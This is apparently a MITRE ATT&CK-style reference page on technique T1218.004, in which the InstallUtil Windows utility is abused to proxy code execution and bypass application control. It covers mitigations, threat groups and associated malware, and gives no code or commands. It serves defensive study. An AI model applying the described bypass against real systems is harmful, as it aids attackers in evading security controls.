Description
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v and C:\Windows\Microsoft.NET\Framework64\v.
InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
Platforms
Mitigations (2)
Execution PreventionM1038
Use application control configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.
Disable or Remove Feature or ProgramM1042
InstallUtil may not be necessary within a given environment.
Threat Groups (2)
| ID | Group | Context |
|---|---|---|
| G0129 | Mustang Panda | [Mustang Panda](https://attack.mitre.org/groups/G0129) has used <code>InstallUtil.exe</code> to execute a malicious Beacon stager.(Citation: Anomali M... |
| G0045 | menuPass | [menuPass](https://attack.mitre.org/groups/G0045) has used <code>InstallUtil.exe</code> to execute malicious software.(Citation: PWC Cloud Hopper Tech... |
Associated Software (4)
| ID | Name | Type | Context |
|---|---|---|---|
| S0631 | Chaes | Malware | [Chaes](https://attack.mitre.org/software/S0631) has used Installutill to download content.(Citation: Cybereason Chaes Nov 2020) |
| S0689 | WhisperGate | Malware | [WhisperGate](https://attack.mitre.org/software/S0689) has used `InstallUtil.exe` as part of its process to disable Windows Defender.(Citation: Unit 4... |
| S1155 | Covenant | Tool | [Covenant](https://attack.mitre.org/software/S1155) can create launchers via an InstallUtil XML file to install new Grunt listeners.(Citation: Github ... |
| S1018 | Saint Bot | Malware | [Saint Bot](https://attack.mitre.org/software/S1018) had used `InstallUtil.exe` to download and deploy executables.(Citation: Malwarebytes Saint Bot A... |
References
- LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.
Frequently Asked Questions
What is T1218.004 (InstallUtil)?
T1218.004 is a MITRE ATT&CK technique named 'InstallUtil'. It belongs to the Stealth tactic(s). Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by exec...
How can T1218.004 be detected?
Detection of T1218.004 (InstallUtil) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1218.004?
There are 2 documented mitigations for T1218.004. Key mitigations include: Execution Prevention, Disable or Remove Feature or Program.
Which threat groups use T1218.004?
Known threat groups using T1218.004 include: Mustang Panda, menuPass.